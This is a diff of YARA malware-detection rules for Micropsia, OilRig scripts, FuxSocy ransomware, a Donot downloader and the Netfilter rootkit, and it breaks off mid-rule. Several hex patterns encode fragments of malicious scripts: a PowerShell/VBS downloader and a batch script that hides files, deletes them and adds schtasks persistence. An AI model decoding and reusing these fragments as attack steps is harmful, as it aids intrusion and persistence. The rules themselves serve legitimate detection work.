-rule ARKBIRD_SOLG_APT_APT_C_23_Micropsia_Mar_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_Fuxsocy_May_2021_1 : FILE { meta: - description = "Detect Micropsia used by APT-C-23 (Build 2018)" + description = "Detect FuxSocy ransomware" author = "Arkbird_SOLG" - id = "517a33bb-0214-588f-80e4-dc82f2552330" - date = "2021-03-31" - modified = "2021-03-31" + id = "2420c2fa-bc94-51a6-87ab-4e8d226fdd23" + date = "2020-05-09" + modified = "2021-05-09" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-31/APT-C-23/APT_APT_C_23_Micropsia_Mar_2021_1.yar#L1-L24" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-09/FuxSocy/RAN_FuxSocy_May_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "69baab88d80ab15e08f3b08dfca45a1fee6c2e6077152906f391618713fac2ef" - score = 50 - quality = 69 + logic_hash = "ab34f95d2b12bdf2d362538e880301542c3308fff427cfb5ee59e9dca89ec033" + score = 75 + quality = 75 tags = "FILE" - hash1 = "eb846bb491bea698b99eab80d58fd1f2530b0c1ee5588f7ea02ce0ce209ddb60" - level = "experimental" + hash1 = "d786355c1b3dc741103873aed46d8ffa3430d113a27482f37f3ffc7c978747f6" + hash2 = "43bbfb3389deb3846bba19a8ab2e9c8fd9b581720962b8170d4a63ad816b5804" + tlp = "White" + adversary = "-" strings: - $code1 = { c7 85 6c fc ff ff 12 00 00 00 8b f4 8d 85 6c fc ff ff 50 8d 8d 78 fc ff ff 51 ff 15 44 b0 66 00 3b f4 e8 80 d6 fa ff 8d 85 78 fc ff ff 50 b9 e0 83 66 00 e8 06 0d fb ff 6a 00 e8 24 0a 00 00 83 c4 04 50 e8 a2 d9 fa ff 83 c4 04 c7 85 60 fc ff ff } - $code2 = { 68 34 4f 61 00 8d 85 cc fd ff ff 50 e8 3d 02 fd ff 83 c4 08 8b f4 6a 00 6a 00 6a 00 6a 00 8d 85 e8 fd ff ff 50 ff 15 60 b3 66 00 3b f4 e8 f2 0d fd ff 89 85 c0 fd ff ff 83 bd c0 fd ff ff 00 0f 84 49 03 00 00 8b f4 6a 00 6a 00 6a 03 6a 00 6a 00 0f b7 05 d4 83 66 00 50 8b 4d 10 51 8b 95 c0 fd ff ff 52 ff 15 58 b3 66 00 3b f4 e8 b3 0d fd ff 89 85 b4 fd ff ff 83 bd b4 fd ff ff 00 0f 84 f4 02 00 00 8b f4 6a 00 a1 d8 83 66 00 50 6a 00 6a 00 68 5c 4f 61 00 8b 4d 14 51 8d 95 cc fd ff ff 52 8b 85 b4 fd ff ff 50 ff 15 70 b3 66 00 3b f4 e8 6e 0d fd ff 89 85 a8 fd ff ff 83 bd a8 fd ff ff 00 0f 84 af 02 00 00 c7 85 9c fd ff ff 00 00 00 00 83 } - $code3 = { 8b 85 60 fc ff ff 83 c0 01 89 85 60 fc ff ff 83 bd 60 fc ff ff 0a 7d 2a e8 3f fc fa ff 99 b9 1a 00 00 00 f7 f9 83 c2 41 88 95 57 fc ff ff 0f b6 85 57 fc ff ff 50 b9 e0 83 66 00 e8 8b 14 fb } - $s1 = "szhttpUserAgent" fullword ascii - $s2 = "httpUseragent" fullword ascii - $s3 = "dwByteRead" fullword ascii - $s4 = { 25 59 25 6d 25 64 2d 25 49 2d 25 4d 2d 25 53 } - $s5 = { 53 45 4c 45 43 54 20 27 43 52 45 41 54 45 20 49 4e 44 45 58 20 76 61 63 75 75 6d 5f 64 62 2e 27 20 7c 7c 20 73 75 62 73 74 72 28 73 71 6c 2c 31 34 29 20 20 46 52 4f 4d 20 73 71 6c 69 74 65 5f 6d 61 73 74 65 72 20 57 48 45 52 45 20 73 71 6c 20 4c 49 4b 45 20 27 43 52 45 41 54 45 20 49 4e 44 45 58 20 25 27 } - $s6 = { 55 50 44 41 54 45 20 25 51 2e 25 73 20 53 45 54 20 73 71 6c 20 3d 20 43 41 53 45 20 57 48 45 4e 20 74 79 70 65 20 3d 20 27 74 72 69 67 67 65 72 27 20 54 48 45 4e 20 73 71 6c 69 74 65 5f 72 65 6e 61 6d 65 5f 74 72 69 67 67 65 72 28 73 71 6c 2c 20 25 51 29 45 4c 53 45 20 73 71 6c 69 74 65 5f 72 65 6e 61 6d 65 5f 74 61 62 6c 65 28 73 71 6c 2c 20 25 51 29 20 45 4e 44 2c 20 74 62 6c 5f 6e 61 6d 65 20 3d 20 25 51 2c 20 6e 61 6d 65 20 3d 20 43 41 53 45 20 57 48 45 4e 20 74 79 70 65 3d 27 74 61 62 6c 65 27 20 54 48 45 4e 20 25 51 20 57 48 45 4e 20 6e 61 6d 65 20 4c 49 4b 45 20 27 73 71 6c 69 74 65 5f 61 75 74 6f 69 6e 64 65 78 25 25 27 20 41 4e 44 20 74 79 70 65 3d 27 69 6e 64 65 78 27 20 54 48 45 4e 20 27 73 71 6c 69 74 65 5f 61 75 74 6f 69 6e 64 65 78 5f 27 20 7c 7c 20 25 51 20 7c 7c 20 73 75 62 73 74 72 28 6e 61 6d 65 2c 25 64 2b 31 38 29 20 45 4c 53 45 20 6e 61 6d 65 20 45 4e 44 20 57 48 45 52 45 20 74 62 6c 5f 6e 61 6d 65 3d 25 51 20 43 4f 4c 4c 41 54 45 20 6e 6f 63 61 73 65 20 41 4e 44 20 28 74 79 70 65 3d 27 74 61 62 6c 65 27 20 4f 52 20 74 79 70 65 3d 27 69 6e 64 65 78 27 20 4f 52 20 74 79 70 65 3d 27 74 72 69 67 67 65 72 27 29 3b } - $s7 = { 25 00 6c 00 73 00 28 00 25 00 64 00 29 } - $s8 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 25 73 0d 0a } + $seq1 = { b8 48 14 00 00 e8 b8 83 00 00 53 55 56 8d 44 24 48 8b e9 50 55 89 54 24 14 33 f6 ff 15 84 02 41 00 8b d8 85 db 0f 84 fa 00 00 00 57 8b cb e8 2b 09 00 00 8b f8 85 ff 0f 84 e7 00 00 00 57 53 56 55 ff 15 8c 02 41 00 8b 1d 78 02 41 00 8d 44 24 18 50 8d 44 24 18 50 68 cc 14 48 00 57 89 74 24 24 89 74 24 28 ff d3 83 7c 24 18 04 0f 82 ab 00 00 00 8b 44 24 10 8b 4c 24 14 c7 44 24 1c 00 15 48 00 c7 44 24 20 14 15 48 00 c7 44 24 24 30 15 48 00 c7 44 24 28 48 15 48 00 c7 44 24 2c 60 15 48 00 c7 44 24 30 80 15 48 00 c7 44 24 34 a0 15 48 00 c7 44 24 38 c0 15 48 00 c7 44 24 3c e0 15 48 00 c7 44 24 40 fc 15 48 00 c7 44 24 44 14 16 48 00 c7 44 24 48 38 16 48 00 ff 74 84 1c 0f b7 41 02 50 0f b7 01 50 8d 44 24 60 68 54 16 48 00 50 ff 15 64 02 41 00 83 c4 14 8d 44 24 50 50 8d 44 24 14 50 8d 44 24 5c 50 57 ff d3 85 c0 74 0d 8b 4c 24 10 33 d2 e8 47 0a 00 00 8b f0 8b cf e8 c9 08 00 00 5f 8b c6 5e 5d 5b 81 c4 48 14 00 00 } + $seq2 = { 8d 44 24 50 50 8d 44 24 4c 50 8d 44 24 2c 50 55 ff 15 ec 00 41 00 8b 44 24 14 8b 74 24 18 ff 74 24 68 88 87 57 01 08 00 66 a1 80 4d 41 00 [10] 88 9f 54 01 08 00 c6 87 63 01 08 00 10 89 b7 58 01 08 00 66 89 87 5d 01 08 00 ff 15 6c 00 41 00 0f b6 97 63 01 08 00 03 c0 66 89 87 55 01 08 00 8b 44 24 20 8d 8f 64 01 08 00 88 87 5c 01 08 00 e8 14 2b 00 00 8b 44 24 14 0f b6 c8 0f b7 87 55 01 08 00 83 c1 03 8d 0c c8 89 8f 4c 01 08 00 e8 2e 3a 00 00 8b c8 89 8f 48 01 08 00 85 c9 0f 84 0f 01 00 00 8b 44 24 28 89 41 04 8b 8f 48 01 08 00 8b 44 24 24 89 01 8b 8f 48 01 08 00 8b 44 24 4c 89 41 0c 8b 8f 48 01 08 00 8b 44 24 48 89 41 08 8b 8f 48 01 08 00 8b 44 24 54 89 41 14 8b 8f 48 01 08 00 8b 44 24 50 89 41 10 0f b7 87 55 01 08 00 50 8b 87 48 01 08 00 ff 74 24 6c 83 c0 18 50 e8 b4 b5 00 00 8b 4c 24 6c 33 d2 e8 bd 3b 00 00 8b 4c 24 70 33 d2 89 47 08 e8 af 3b 00 00 0f b6 97 63 01 08 00 89 47 0c 8b 44 24 78 89 87 28 02 08 00 8b 44 24 44 89 47 04 8d 87 44 00 08 00 50 8d 8f 64 01 08 00 89 2f e8 4d 24 00 00 89 b7 18 02 08 00 8b 87 c5 01 08 00 f7 a7 58 01 08 00 8b c8 0f b6 87 5c 01 08 00 8b f2 99 83 c4 10 ff b7 28 02 08 00 03 c8 13 f2 03 0d 80 4d 41 00 13 35 84 4d 41 00 89 8f 1c 02 08 00 89 b7 20 02 08 00 ff 15 c4 00 41 00 53 57 ff 74 24 44 55 ff 15 e8 00 41 00 } + $seq3 = { 57 68 ff 01 0f 00 ff 75 08 8b fa 51 32 db ff 15 0c 00 41 00 8b f0 85 f6 74 76 32 ff eb 52 84 ff 75 65 33 c0 50 50 50 50 50 50 50 6a ff 6a 04 6a ff 56 ff 15 10 00 41 00 8b 45 c0 83 f8 01 74 2c 76 2e 83 f8 03 76 1a 83 f8 04 75 24 8d 45 e0 50 6a 01 56 ff 15 18 00 41 00 } + $seq4 = { 6a ff 8d 45 fc 50 8d 45 08 50 8d 45 f8 50 ff 33 33 ff 89 7d f8 89 7d 08 89 7d fc ff 15 c8 00 41 00 85 c0 8b 45 08 0f 95 c1 85 c0 74 59 56 } + $seq5 = { 8b 45 08 56 ff 70 08 ff 15 dc 00 41 00 8b ce e8 af 2e 00 00 33 ff 57 ff 75 08 57 ff 33 ff 15 e4 } condition: - uint16(0)==0x5a4d and filesize >50KB and 2 of ($code*) and 5 of ($s*) + uint16(0)==0x5a4d and filesize >30KB and 3 of ($seq*) } -rule ARKBIRD_SOLG_APT_Oilrig_VBS_2016_1 : FILE +rule ARKBIRD_SOLG_APT_Donot_Downloader_May_2021_1 : FILE { meta: - description = "Detect VBS script in base 64 used by OilRig (2016)" + description = "Detect the trojan downloader used by Donot group" author = "Arkbird_SOLG" - id = "5cc3a3f1-4f2f-56c4-af69-8652d22b6730" - date = "2020-08-26" - modified = "2021-07-13" - reference = "https://twitter.com/Arkbird_SOLG/status/1298758788028264450" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-26/APT_OilRig_2016.yar#L4-L23" + id = "251a809e-9e36-5c46-955f-006531bd9619" + date = "2020-05-09" + modified = "2021-05-09" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-09/Donot/APT_Donot_Downloader_May_2021_1.yara#L1-L20" license_url = "N/A" - logic_hash = "a6c42c46c80ca79b01aa0475c823aeccef416a0f8c2f58db95392cbe125b2fad" + logic_hash = "df64ab97b74935ce8b73c3854eb81fa1dbd4e59b1e27c43ae9c85b90aaaef6f7" score = 75 - quality = 63 + quality = 75 tags = "FILE" - hash1 = "1edbb818ea75919bb70bd2496e789e89d26c94cdf65ab61ebb5f1403d45d323c" - hash2 = "1191d5c1dd7f6ac38b8d72bee37415b3ff1c28a8f907971443ac3a36906e8bf5" + hash1 = "28aa296bda12f0184564c5f6b46e679f07255aa8df58b861ea17910cdcaa674a" + hash2 = "03730cdc23a3d10c8752ad1464ff2e68a64c69f8310b0ceea4d52b1db0215dfc" + hash3 = "edd590c343570f7576aca83da58967e058585c6ba861682dca2fc987c713ee3a" + tlp = "White" + adversary = "Donot" strings: - $block1 = { 53 45 39 4e 52 54 30 69 4a 58 42 31 59 6d 78 70 59 79 56 63 54 47 6c 69 63 6d 46 79 61 57 56 7a 58 43 49 } - $block2 = { 43 6c 4e 46 55 6c 5a 46 55 6a 30 69 61 48 52 30 } - $block3 = { 56 34 4c 6d 46 7a 63 48 67 2f 63 6d 56 78 } - $block4 = { 6a 30 69 63 47 39 33 5a 58 4a 7a 61 47 56 73 62 43 41 69 49 69 5a 37 4a 48 64 6a 50 53 68 75 5a 58 63 74 62 32 4a 71 5a 57 4e 30 49 46 4e 35 63 33 52 6c 62 53 35 4f 5a 58 51 75 56 32 56 69 51 32 78 70 5a 57 35 30 4b 54 73 6b 64 32 4d 75 56 58 4e 6c 52 47 56 6d 59 58 56 73 64 45 4e 79 5a 57 52 6c 62 6e 52 70 59 57 78 7a 50 53 52 30 63 6e 56 6c 4f 79 52 33 59 79 35 49 5a 57 46 6b 5a 58 4a 7a 4c 6d 46 6b 5a 43 67 6e 51 57 4e 6a 5a 58 42 30 4a 79 77 6e 4b 69 38 71 4a 79 6b 37 4a 48 64 6a 4c 6b 68 6c 59 57 52 6c 63 6e 4d 75 59 57 52 6b 4b 43 64 56 63 32 56 79 4c 55 46 6e 5a 57 35 30 4a 79 77 6e 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 49 45 4a 4a 56 46 4d 76 4e 79 34 33 4a 79 6b 37 64 32 68 70 62 47 55 6f 4d 53 6c 37 64 48 4a 35 65 79 52 79 50 55 64 6c 64 43 31 53 59 57 35 6b 62 32 30 37 4a 48 64 6a 4c 6b 52 76 64 32 35 73 62 32 46 6b 52 6d 6c 73 } - $block5 = { 69 49 4e 43 6b 4e 79 5a 57 46 30 5a 55 39 69 61 6d 56 6a 64 43 67 69 56 31 4e 6a 63 6d 6c 77 64 43 35 54 61 47 56 73 62 43 49 70 4c 6c 4a 31 62 69 42 53 5a 58 42 73 59 57 [1-4] 45 52 33 62 69 77 69 4c 56 38 [1-4] 4a 6b 64 32 34 69 4b 53} - $block6 = { 30 69 49 69 49 4e 43 6b 4e 79 5a 57 46 30 5a 55 39 69 61 6d 56 6a 64 43 67 69 56 31 4e 6a 63 6d 6c 77 64 43 35 54 61 47 56 73 62 43 49 70 4c 6c 4a 31 62 69 42 53 5a 58 42 73 59 57 4e 6c 4b 45 52 76 64 32 35 73 62 32 46 6b 52 58 68 6c 59 33 56 30 5a 53 77 69 4c 56 38 69 4c 43 4a 69 59 58 51 } - $block7 = { 51 70 72 62 32 31 6a 50 53 4a 77 62 33 64 6c 63 6e 4e 6f 5a 57 78 73 49 43 31 6c 65 47 56 6a 49 45 4a 35 63 47 46 7a 63 79 41 74 52 6d 6c 73 5a 53 41 69 4a 6b } - $block8 = { 0a b7 9a b5 e3 9b 8d e7 2d 59 27 2b 8a 9b 52 85 e9 65 46 e9 [1-4] d4 } + $seq1 = { 65 63 68 6f 20 6f 66 66 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 64 65 6c 20 2f 66 20 25 73 20 0a 20 53 45 54 20 2f 41 20 25 25 43 4f 4d 50 55 54 45 52 4e 41 4d 45 25 25 20 0a 20 53 45 54 20 2f 41 20 52 41 4e 44 3d 25 25 52 41 4e 44 4f 4d 25 25 20 31 30 30 30 30 20 2b 20 32 20 0a 20 65 63 68 6f 20 25 25 43 4f 4d 50 55 54 45 52 4e 41 4d 45 25 25 2d 25 25 52 41 4e 44 25 25 20 3e 3e 20 25 73 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 4d 6f 62 55 70 64 61 74 65 20 2f 66 20 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 54 61 73 6b 55 70 64 61 74 65 20 2f 66 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 4d 61 63 68 69 6e 65 43 6f 72 65 20 2f 66 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 73 63 20 6d 69 6e 75 74 65 20 2f 6d 6f 20 32 30 20 2f 66 20 2f 74 6e 20 54 61 73 6b 55 70 64 61 74 65 20 2f 74 72 20 25 73 20 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 73 63 20 6d 69 6e 75 74 65 20 2f 6d 6f 20 31 30 20 2f 66 20 2f 74 6e 20 4d 61 63 68 69 6e 65 43 6f 72 65 20 2f 74 72 20 25 73 20 0a 20 6d 6f 76 65 20 25 25 41 50 50 44 41 54 41 25 } + $seq2 = { c7 44 24 10 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 00 00 00 00 c7 04 24 ?? 42 [2] e8 ?? 01 00 00 83 ec 14 [0-3] c7 44 24 14 00 00 00 00 c7 44 24 10 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 [2-5] 24 04 [0-3] 89 04 24 e8 ?? 01 00 00 83 ec 18 89 [1-9] c7 44 24 04 ?? 43 [2] c7 04 24 ?? 61 [2] e8 ?? 08 00 00 } + $s1 = "VirtualQuery failed for %d bytes at address %p" fullword ascii + $s2 = { 25 73 5c [1-14] 2e 62 61 74 } + $s3 = { 25 73 5c [1-14] 25 } condition: - filesize <2KB and 6 of them + uint16(0)==0x5a4d and filesize >10KB and all of ($seq*) and 2 of ($s*) } -rule ARKBIRD_SOLG_APT_Oilrig_PSH_Helminth_2016_1 : FILE +rule ARKBIRD_SOLG_MAL_Netfilter_May_2021_1 : FILE { meta: - description = "Detect Powershell script Helminth in base 64 used by OilRig (2016)" + description = "Detect Netfilter rootkit" author = "Arkbird_SOLG" - id = "782503c2-a292-505c-b513-79cbbd381124" - date = "2020-08-26" - modified = "2021-07-13" - reference = "https://twitter.com/Arkbird_SOLG/status/1298758788028264450" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-26/APT_OilRig_2016.yar#L25-L45" + id = "da333ed8-8cd3-5ae4-bce5-a43a227fdee3" + date = "2021-06-18" + modified = "2021-06-21" + reference = "https://twitter.com/struppigel/status/1405483373280235520" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-18/Netfilter/MAL_Netfilter_May_2021_1.yara#L1-L22" license_url = "N/A" - logic_hash = "0216015765f5abdb6ccf7643344aead51e4eebb19fd947f9484ce5dc6696d4d5" + logic_hash = "f219981af907f74e4d95f768d99b7fd877c8bfb00587d198a4b0e2c521c744e1" score = 75 - quality = 61 + quality = 73 tags = "FILE" - hash1 = "1edbb818ea75919bb70bd2496e789e89d26c94cdf65ab61ebb5f1403d45d323c" - hash2 = "1191d5c1dd7f6ac38b8d72bee37415b3ff1c28a8f907971443ac3a36906e8bf5" + hash1 = "63d61549030fcf46ff1dc138122580b4364f0fe99e6b068bc6a3d6903656aff0" + hash2 = "8249e9c0ac0840a36d9a5b9ff3e217198a2f533159acd4bf3d9b0132cc079870" + hash3 = "d64f906376f21677d0585e93dae8b36248f94be7091b01fd1d4381916a326afe" + tlp = "White" + adversary = "Chinese APT Group" strings: - $block1 = { 70 74 65 57 6c 6b 49 44 30 67 4a 79 4d 6a 49 79 63 67 44 51 6f 67 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 68 76 62 57 55 67 50 53 41 69 4a 47 56 75 64 6a 70 51 64 } - $block2 = { 41 67 ?? ?? 42 6c 62 48 4e 6c 61 57 59 6f 4a 47 31 35 5a 6d 78 68 5a 7a 4d 67 4c 57 56 78 49 44 49 70 49 41 30 4b 49 43 41 67 49 48 73 67 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 67 6e 64 33 63 6e 4b 79 52 6e 62 47 39 69 59 57 77 36 62 58 6c 70 5a 43 73 6b 59 32 31 6b 61 57 51 72 4a 48 42 68 63 6e 52 70 5a 43 73 6f } - $block3 = { 6a 61 47 46 79 58 53 42 62 61 57 35 30 58 53 41 6b 64 47 31 77 57 7a 42 64 4b 53 41 72 49 43 } - $block4 = { 43 52 6a 62 6e 51 67 4c 57 56 78 49 44 49 31 4b 53 6b 67 44 51 6f 67 49 43 41 67 65 79 41 } - $block5 = { 5a 6c 52 45 35 54 49 43 67 6b 5a 43 6b 67 44 51 70 37 49 41 30 4b 43 53 52 6a 62 6e 51 67 50 53 41 77 49 41 30 4b 43 58 64 6f 61 57 78 6c 49 43 67 6b 59 32 35 30 49 43 31 73 64 43 41 79 4d 43 6b 67 44 51 6f 4a 65 79 41 4e 43 67 6b 4a 64 48 4a 35 49 41 30 4b 43 51 6c 37 } - $block6 = { 4b 49 43 41 67 49 43 41 67 49 43 41 6b 61 53 73 72 49 41 30 4b 49 43 41 67 49 48 30 67 44 51 6f 67 49 43 41 67 61 57 59 6f 4a 48 4a 6c 64 43 41 74 5a 58 45 67 4d 53 6b 67 44 51 6f 67 49 43 41 } - $block7 = { 77 36 62 58 6c 6d 62 47 46 6e 49 44 30 67 4d 43 41 4e 43 69 41 67 49 43 42 39 49 41 30 4b 49 43 41 67 49 47 56 73 63 32 56 70 5a 69 41 6f 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 5a 73 59 57 63 67 4c 57 56 78 49 44 45 70 49 41 30 4b 49 43 41 67 49 48 73 67 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 52 30 62 58 41 67 50 53 41 6b 62 58 6c 6b 59 58 52 68 4c 6c 4e 77 62 47 6c 30 4b 43 63 75 4a 79 6b 67 44 51 6f 67 49 43 41 67 49 43 41 67 49 46 74 54 65 58 4e 30 5a 57 30 75 53 55 38 75 52 6d 6c 73 5a 56 30 36 4f 6b 46 77 63 47 56 75 5a 45 46 73 62 46 52 6c 65 48 51 6f 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 68 76 62 57 55 72 4a 33 52 77 58 43 63 72 4a 47 64 73 62 32 4a 68 62 44 70 6d 61 57 78 6c 62 6d 46 74 } - $block8 = { 4a 47 6b 72 4b 79 41 4e 43 69 41 67 49 43 42 39 49 41 30 4b 49 48 30 67 44 51 6f 67 44 51 6f 67 5a 6e 56 75 59 33 52 70 62 32 34 67 52 32 56 30 53 55 [1-10] 4e 43 69 41 67 49 43 41 6b 5a 32 78 76 59 6d 46 73 4f 6d 31 35 61 57 51 67 50 53 42 54 5a 57 35 6b 55 6d 56 6a 5a 57 6c 32 5a 55 52 4f 55 79 41 6f 4b 45 64 6c 64 46 4e 31 59 69 41 77 4b 53 73 6e 4d 7a 41 6e 4b 53 41 4e 43 69 42 39 49 41 30 4b 49 41 30 4b 49 47 5a 31 62 6d 4e 30 61 57 39 [1-10] 56 52 6f 61 58 4e 47} - $block9 = { 73 67 44 51 6f 4a 43 57 31 6b 49 43 31 47 62 33 4a 6a 5a 53 41 6f 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 68 76 62 57 55 72 4a 33 52 77 58 43 63 70 49 41 30 4b 43 51 6c 48 5a 58 52 4a 52 43 41 4e 43 67 6b 4a 51 32 68 68 62 6d 64 6c 56 47 68 70 63 30 5a 70 62 47 55 67 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 6c 6b 49 41 30 4b 49 43 41 67 49 48 30 67 44 51 6f 67 66 53 41 4e 43 69 42 6d 64 57 35 6a 64 47 6c 76 62 69 42 74 59 57 6c 75 49 41 30 4b } + $seq1 = { 48 8b 05 a9 57 ff ff 45 33 c9 49 b8 32 a2 df 2d 99 2b 00 00 48 85 c0 74 05 49 3b c0 75 38 0f 31 48 c1 e2 20 48 8d 0d 85 57 ff ff 48 0b c2 48 33 c1 48 89 05 78 57 ff ff 66 44 89 0d 76 57 ff ff 48 8b 05 69 57 ff ff 48 85 c0 75 0a 49 8b c0 48 89 05 5a 57 ff ff 48 f7 d0 48 89 05 58 57 } + $seq2 = { 48 83 ec 38 48 83 64 24 20 00 48 8d 05 83 4c 00 00 48 8d 15 24 d1 00 00 48 89 44 24 28 48 8d 4c 24 20 e8 4d 05 00 00 85 c0 78 16 4c 8d 05 22 d1 00 00 83 ca ff 48 8d 0d 00 d1 00 00 e8 39 05 00 00 48 83 c4 } + $seq3 = { 45 33 c0 48 8d 4c 24 40 41 8d 50 01 ff 15 5d 62 00 00 c6 84 24 88 00 00 00 01 48 8d 84 24 88 00 00 00 48 89 46 18 48 8d 0d e2 fe ff ff 48 89 9e c0 00 00 00 48 8d 44 24 40 48 89 46 50 48 8d 44 24 30 48 89 46 48 65 48 8b 04 25 88 01 00 00 48 89 86 98 00 00 00 48 8b 86 b8 00 00 00 40 88 7e 40 c6 40 b8 06 4c 89 78 e0 48 89 58 e8 c7 40 c0 01 00 00 00 c7 40 c8 0d 00 00 00 48 89 58 d0 48 8b 86 b8 00 00 00 48 89 48 f0 48 8d 4c 24 40 48 89 48 f8 c6 40 bb e0 48 8b 43 28 48 85 c0 74 2f 48 8b 48 10 48 85 c9 74 07 48 21 78 10 4c 8b f1 48 8b 08 48 85 c9 74 06 48 21 38 48 8b e9 48 8b 48 08 48 85 c9 74 08 48 83 60 08 00 48 8b f9 48 8b d6 49 8b cf ff 15 74 61 00 00 3d 03 01 00 00 75 19 48 83 64 24 20 00 48 8d 4c 24 40 41 b1 01 45 33 c0 33 d2 ff 15 64 61 00 00 48 8b 43 28 48 85 c0 74 1a 4d } + $seq4 = { 8b 84 24 80 00 00 00 48 8d 54 24 38 48 8b 4c 24 30 44 8b ce 89 44 24 28 45 33 c0 48 89 7c 24 20 ff 15 66 2e 00 00 48 8b 4c 24 30 8b d8 ff 15 49 2e 00 00 48 8b 4c 24 30 ff 15 26 2d 00 00 8b } + $s1 = "%sc=%s" fullword ascii + $s2 = { 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 } + $s3 = "NETIO.SYS" fullword ascii condition: - filesize <3KB and 7 of them + uint16(0)==0x5a4d and filesize >20KB and (3 of ($seq*) or 2 of ($s*)) } -rule ARKBIRD_SOLG_RAN_Piton_Nov_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Netfilter_Dropper_Jun_2021_1 : FILE { meta: - description = "Detect Piton variant (rebuild from the Babuk leaks)" + description = "Detect the dropper of Netfilter rootkit" author = "Arkbird_SOLG" - id = "433d0692-553b-5efe-84e4-134e99342fe5" - date = "2021-11-03" - modified = "2021-11-04" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-04/RAN_Piton_Nov_2021_1.yara#L1-L18" + id = "5e67c99c-6b08-5190-9c8a-55086c20923e" + date = "2020-06-18" + modified = "2021-06-18" + reference = "https://twitter.com/struppigel/status/1405483373280235520" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-18/Netfilter/MAL_Netfilter_Dropper_Jun_2021_1.yara#L1-L20" license_url = "N/A" - logic_hash = "cd8287b3be0f8f9338cf6ba8eb24dd9a6f91a54c984a635e1103f7e6028cbf3c" + logic_hash = "66e96304e097a0f6cd99cf77b20f61b8a0bcceaf8685a336c039a80947a08f78" score = 75 quality = 75 tags = "FILE" - hash1 = "71936bc3ee40c7ea678889d2ad5fa7eb39401752cd58988ce462f9d4048578ac" - hash2 = "77c7839c7e8d4aaf52e33a2f29db8459381b5cc3b2700072305a8bae5e0762a9" - hash3 = "ae6020a06d2a95cbe91b439f4433e87d198547dec629ab0900ccfe17e729cff1" - tlp = "white" - adversary = "RAAS" + hash1 = "a5c873085f36f69f29bb8895eb199d42ce86b16da62c56680917149b97e6dac" + hash2 = "659e0d1b2405cadfa560fe648cbf6866720dd40bb6f4081d3dce2dffe20595d9" + hash3 = "d0a03a8905c4f695843bc4e9f2dd062b8fd7b0b00103236b5187ff3730750540" + tlp = "White" + adversary = "Chinese APT Group" strings: - $s1 = { 68 38 3c 40 00 6a 00 68 01 00 1f 00 ff 15 c4 50 41 00 85 c0 75 11 68 58 3c 40 00 6a 00 6a 00 ff 15 98 50 41 00 eb 0a e9 b0 00 00 00 e9 ab 00 00 00 c7 45 a8 00 00 00 00 68 78 3c 40 00 8b 55 c8 52 8b 45 e8 50 e8 86 9b ff ff 83 c4 0c 0f b6 c8 83 f9 01 75 0c 8b 55 a8 52 e8 02 f9 ff ff 83 c4 04 e8 ea 94 ff ff ff 15 04 51 41 00 89 45 c0 83 7d c0 00 74 3f b8 41 00 00 00 66 89 45 f0 eb 0c 66 8b 4d f0 66 83 c1 01 66 89 4d f0 0f b7 55 f0 83 fa 5a 7f 1f 8b 45 c0 83 e0 01 74 } - $s2 = { 68 80 16 40 00 ff 15 38 50 41 00 89 45 f0 68 90 16 40 00 8b 45 f0 50 ff 15 34 50 41 00 89 45 fc 83 7d fc 00 74 07 8d 4d f8 51 ff 55 fc 6a 00 6a 00 68 b0 16 40 00 68 08 17 40 00 68 18 17 40 00 6a 00 ff 15 4c 51 41 00 e8 9d 03 00 00 85 c0 74 2d 68 24 17 40 00 ff 15 38 50 41 00 89 45 ec 68 34 17 40 00 8b 55 ec 52 ff 15 34 50 41 00 